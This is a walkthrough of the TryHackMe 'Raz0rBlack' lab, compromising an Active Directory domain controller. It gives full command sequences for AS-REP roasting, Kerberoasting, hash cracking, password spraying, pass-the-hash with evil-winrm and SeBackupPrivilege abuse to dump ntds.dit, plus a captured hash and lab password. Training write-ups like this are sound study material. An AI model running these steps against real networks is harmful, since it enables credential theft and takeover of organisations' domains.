THM: Raz0rBlack
In this article, I step through the process of exploiting a domain controller by enumerating RPCbind & NFS, abusing Kerberos, enumerating SMB and elevating my privileges on the domain controller by exploiting a user belonging to the Backup Operators group. This challenge is available on the TryHackMe platform and is titled “RAZ0RBLACK 2.1”, created by the user “Xyan1d3”.
Disclaimer
I like to add a brief disclaimer before a writeup to encourage people to attempt the room before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, lets get started!
Port Enumeration
I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports.
nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report -Pn 10.10.7.159PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125 111/tcp open rpcbind syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
593/tcp open http-rpc-epmap syn-ack ttl 125
636/tcp open ldapssl syn-ack ttl 125
2049/tcp open nfs syn-ack ttl 125
3268/tcp open globalcatLDAP syn-ack ttl 125
3269/tcp open globalcatLDAPssl syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
9389/tcp open adws syn-ack ttl 125
47001/tcp open winrm syn-ack ttl 125
49664/tcp open unknown syn-ack ttl 125
49665/tcp open unknown syn-ack ttl 125
49666/tcp open unknown syn-ack ttl 125
49669/tcp open unknown syn-ack ttl 125
49672/tcp open unknown syn-ack ttl 125
49675/tcp open unknown syn-ack ttl 125
49676/tcp open unknown syn-ack ttl 125
49679/tcp open unknown syn-ack ttl 125
49694/tcp open unknown syn-ack ttl 125
49708/tcp open unknown syn-ack ttl 125
49846/tcp open unknown syn-ack ttl 125
Reviewing the output, I can see that there are twenty-six ports open. I next used NMAP to identify the services running on each port and used the common NSE scripts to find any common vulnerabilities that I could exploit.
nmap -sV -sC -Pn -v -oN nmap-report 10.10.7.159 -p 53,111,135,139,445,593,636,2049,3268,3269,3389,5985,9389,47001,49664,49665,49666,49669,49672,49675,49676,49679,49694,49708,49846I can see a lot of output from NMAP and some interesting services that I can further enumerate.
Rpcbind & NFS Enumeration
There was a lot of information collected by NMAP when it scanned port 111, which was running the rpcbind service. The rpcbind service redirects the client to the proper port number so it can communicate with the requested service.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs <---- Interesting
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 statusI can see that NMAP identified the NFS service, which means I am able to list and download (and maybe upload) files. I can also see that NMAP found port 2049 with NFS running on it.
2049/tcp open mountd 1-3 (RPC #100005)NFS is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. I can check if any share is available for mounting, using showmount tool.
$sudo showmount -e 10.10.7.159
[sudo] password for kali:
Export list for 10.10.7.159:
/users (everyone)The “/users” directory is mountable. I created a new directory under the tmp folder and ran the following command to mount the home folder on this newly created directory.
mkdir /tmp/infosec
mount -t nfs 10.10.63.208:/users /tmp/infosecNext, I checked that the directory was mounted successfully.
$ df -k10.10.7.159:/users 20407296 16603136 3804160 82% /tmp/infosec
I navigated to “/tmp/infosec” directory and listed the contents. I can see that there are two files.
$ sudo ls -la /tmp/infosec
-rwx------ 1 nobody 4294967294 9861 Feb 25 2021 employee_status.xlsx
-rwx------ 1 nobody 4294967294 80 Feb 25 2021 sbradley.txtI copied both files to my current working directory and retrieved the first flag for the user Steven, which was stored in “sbradley.txt”.
Next, I opened the “employee_status.xlsx” file.
I can see a list of players and their role within the haven secret hacker’s club. The user “ljudmila vetrova” is particularly interesting, since they are the Active Directory Admin.
Kerberos Enumeration
Kerberos is a key authentication service within Active Directory that runs on port 88. We can use the tool kerbrute to enumerate users, which can be used to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. To use kerbrute, we need to specify the domain name and provide a list of users. Earlier, NMAP had identified the domain name as “raz0rblack.thm”, based on information provided by port 3389.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RAZ0RBLACK
| NetBIOS_Domain_Name: RAZ0RBLACK
| NetBIOS_Computer_Name: HAVEN-DC
| DNS_Domain_Name: raz0rblack.thm
| DNS_Computer_Name: HAVEN-DC.raz0rblack.thmWe can also utilize the list of names discovered earlier in the “employee_status.xlsx” file to enumerate users. Based on the naming convention used for “sbradley.txt” and for the challenge questions, it appears the first initial of the users first name is concatenated with their surname. I used this naming convention when creating my user list based on the list of names in the “employee_status.xlsx” file.
./kerbrute_linux_amd64 userenum --dc 10.10.253.179 -d spookysec.local -o kerbrute-user-enum userlist2022/04/09 20:40:42 > [+] VALID USERNAME: lvetrova@raz0rblack.thm
2022/04/09 20:40:42 > [+] VALID USERNAME: twilliams@raz0rblack.thm
2022/04/09 20:40:42 > [+] VALID USERNAME: sbradley@raz0rblack.thm
ASREPRoasting
Now that I have some usernames, I decided to perform ASReproasting. This occurs when an user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. Using the Impacket tool “GetNPUsers.py”, we can check the list of enumerated users identified with kerbrute earlier.
sudo python3 GetNPUsers.py raz0rblack.thm/ -dc-ip 10.10.160.198 -usersfile kerberos-usernames -no-pass -request -outputfile kerberos-users-foundLooking at the output file, I can see that we obtained a TGT ticket for the user “twilliams@raz0rblack.thm”
$krb5asrep$23$twilliams@raz0rblack.thm@RAZ0RBLACK.THM:50792603765164974bfbcf6b50a79f03$515241628dc6711dd499f6e5c23493b674b4b641c55df1b773fcccc0322ec68b45fa32e84c5f9b6d1097fac39097e6302f7835af51c6c05ac1b5fa392737eb021ea564c392916745a29ac4f7b37f735970ce9bb904c74ebb530086dc93e9b7b8b494e33393430deac61523ebae352a820d64d081fd112219e66331e4cb9ca45f5bba18276606c307b541ee7196d57c224e0f6a491fb0e1327dc2fc63ee62b56e0244a93ef6de3d56ee346fb439674d08ea745d8f927225daf809979329dd0b217d7633f47bcd864b82c135c1f1203b7290f14ad4fec88dce9c49b8e2afa381e5568e7a39fde062ff9d659270015fa9caNext, I can use hashcat to crack the “Kerberos 5 AS-REP etype 23” hash retrieved from the KDC.
hashcat64.exe -m 18200 -a 0 hash.txt rockyou.txt 
SMB Enumeration
I can see that ports 139 and 445 are open. Ports 139 and 445 are used for authentication and file sharing. There are multiple tools available to enumerate port 139/445. I started by using smbmap.
smbmap -H 10.10.160.198 -u twilliams -p roastpotatoes
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
trash NO ACCESS Files Pending for deletionI can see that the IPC$ is Read Only, indicating that we can enumerate usernames.
crackmapexec smb 10.10.160.198 -u twilliams -p <....> --rid-brute500: RAZ0RBLACK\Administrator (SidTypeUser)
501: RAZ0RBLACK\Guest (SidTypeUser)
502: RAZ0RBLACK\krbtgt (SidTypeUser)
1000: RAZ0RBLACK\HAVEN-DC$ (SidTypeUser)
1106: RAZ0RBLACK\xyan1d3 (SidTypeUser)
1107: RAZ0RBLACK\lvetrova (SidTypeUser)
1108: RAZ0RBLACK\sbradley (SidTypeUser)
1109: RAZ0RBLACK\twilliams (SidTypeUser)
I can see an interesting SMB share called “trash” but I do not currently have access to it with the credentials for user “twilliams”. I decided to check for password reuse using crackmapexec and the list of users enumerated from the IPC$ share.
crackmapexec smb 10.10.169.150 -u userlist -p <....>[-] raz0rblack.thm\Administrator:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\guest:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\krbtgt:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\HAVEN-DC$:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\ljudmila:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\lvetrova:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\sbradley:<pass> STATUS_PASSWORD_MUST_CHANGE
It appears that the user “sbradley” can reset their password. We can specify the old password (i.e. the one used with crackmapexec above) and the tool smbpasswd to reset the users password.
smbpasswd -r 10.10.169.150 -U sbradleyOld SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley
I can now use the newly reset credentials for the user “sbradley” to further enumerate the SMB shares.
smbmap -H 10.10.127.15 -u sbradley -p password
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
trash READ ONLY Files Pending for deletionI see that I now have READ-ONLY access to the SMB share called trash. Looking at the contents of the share, I can see three files.
smbclient //10.10.127.15/trash -U sbradley
smb: \> ls
chat_log_20210222143423.txt A 1340 Thu Feb 25 19:29:05 2021
experiment_gone_wrong.zip A 18927164 Tue Mar 16 06:02:20 2021
sbradley.txt A 37 Sat Feb 27 19:24:21 2021Looking at the “chat_log_20210222143423.txt” file, I can see CVE-2020–1472 (i.e. ZeroLogon) is mentioned. The user “sbradley” also appeared to have made an encrypted zip containing the ntds.dit and the SYSTEM.hive files, before the administrator revoked their WinRM-Access. I used fcrackzip to find the password for the encrypted ZIP file with “rockyou.txt” wordlist.
fcrackzip -u -D -p ~/rockyou.txt experiment_gone_wrong.zipPASSWORD FOUND!!!!: pw == electro......
I extracted the ntds.dit and the SYSTEM.hive files, then I used “secretsdump.py” to extract the password hashes.
sudo python3 secretsdump.py -system system.hive -ntds ntds.dit LOCALThis presents me with a long list of potential hashes. I extracted the actual hashes from the output from “secretsdump.py” using the cut command.
cat hashes | cut -d ':' -f 4Next, I used crackmapexec to identify the hash for the user lvetrova.
crackmapexec smb 10.10.105.22 -u lvetrova -H userhashes[+] raz0rblack.thm\lvetrova:f220d3988deb**************
Now that we have the user’s hash, we can use evil-winrm to perform a pass the hash attack to login.
evil-winrm -u lvetrova -H f220d3988deb3f***** -i 10.10.105.22 -NI started enumerating the target and found an xml file called “lvetrova.xml”.
*Evil-WinRM* PS C:\Users\lvetrova> dirDirectory: C:\Users\lvetrovaMode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 10:14 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 10:16 AM 1692 lvetrova.xml
I used type command to show the contents of the file and I can see that it is a PSCredential PowerShell xml file. The PSCredential object represents a set of security credentials such as a user name and password.
We can read the flag stored in the xml file using PowerShell, as seen below.
Kerberoasting
Since we have a valid hash, I can look for supported SPNs and get a TGS ticket for an SPN using “GetUserSPNs.py” tool from Impacket.
sudo python3 GetUserSPNs.py -dc-ip 10.10.32.193 raz0rblack.thm/lvetrova -hashes f220d3988deb3******:f220d3988deb3***** -requestThis successfully provides a TGS hash for the user “xyan1d3” and I can now use hashcat to fetch the password.
hashcat64.exe -m 13100 hash.txt rockyou.txt
I next used the credentials with evil-winrm to login. Once logged in, I found another PSCredential PowerShell xml file, which contains the flag, despite stating otherwise.
Privilege Escalation
I started by performing some manual user enumeration using whoami.
whoami /allGroup Name Type
========================================== ================
Everyone Well-known group
BUILTIN\Backup Operators Alias
BUILTIN\Remote Management Users Alias
BUILTIN\Users Alias
......
PRIVILEGES INFORMATION
----------------------Privilege Name Description
============================= ==============================
SeMachineAccountPrivilege Add workstations to domain
SeBackupPrivilege Back up files and directories
SeRestorePrivilege Restore files and directories
SeShutdownPrivilege Shut down the system
SeChangeNotifyPrivilege Bypass traverse checking
SeIncreaseWorkingSetPrivilege Increase a process working set
Looking through the user’s permissions with “whoami /all”, I saw the user is part of the Backup Operators group that has SeBackupPrivilege and SeRestorePrivilege enabled. This can be exploited using multiple techniques, such as using DiskShadow. Below is the script used to get the files.
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:I uploaded the text file and executed the following commands, as outlined by the linked article above.
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> upload back_script.txt*Evil-WinRM* PS C:\Users\xyan1d3\Documents> mkdir C:\tmp*Evil-WinRM* PS C:\Users\xyan1d3\Documents> diskshadow /s back_script.txt*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\tmp> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite*Evil-WinRM* PS C:\temp> reg save hklm\system c:\temp\system*Evil-WinRM* PS C:\temp> download ntds.dit
*Evil-WinRM* PS C:\temp> download system
Once I had the ntds.dit and system file, I could use “secretsdump.py” to retrieve the hashes.
python3 secretsdump.py -system system -ntds ntds.dit LOCALThis provided the hash for the administrator’s account. I can now use evil-winrm to login as the administrator. I can see the PSCredential PowerShell “root.xml” file with the flag but I get an error when attempting to read it.
Looking at the contents of the “root.xml”, I can see the encoded flag. Using CyberChef, I can see that the file’s flag is hex encoded and decoding it gives me the flag.
Tyson’s Flag
I started looking for Tyson’s Flag and found a user folder called “twilliams”. Inside the folder, I found a suspicious file:
definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exeChecking the contents of this file gives me the flag.
Top Secret
The final task for this room is to find the top secret hidden on the machine. Performing some manual enumeration, I identified a folder called “Top Secret” under “Program Files”.
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/21/2021 11:45 AM Amazon
d----- 2/23/2021 6:27 AM Common Files
d----- 5/21/2021 9:39 AM internet explorer
d----- 2/25/2021 10:13 AM Top Secret
d----- 5/21/2021 11:41 AM VMwareI can see an image file stored in the folder called “top_secret.png”. I downloaded the image and opened it.
Based on the image, it appears that the top secret is the full command used to exit VIM.
Final Thoughts
I really enjoyed working through this room and getting the opportunity to learn more about exploiting an Active Directory domain controller. The challenge had a lot of enumeration, which helped me to sharpen my Active Directory enumeration skills. Thank you for reading till the end and keep hacking 😄!
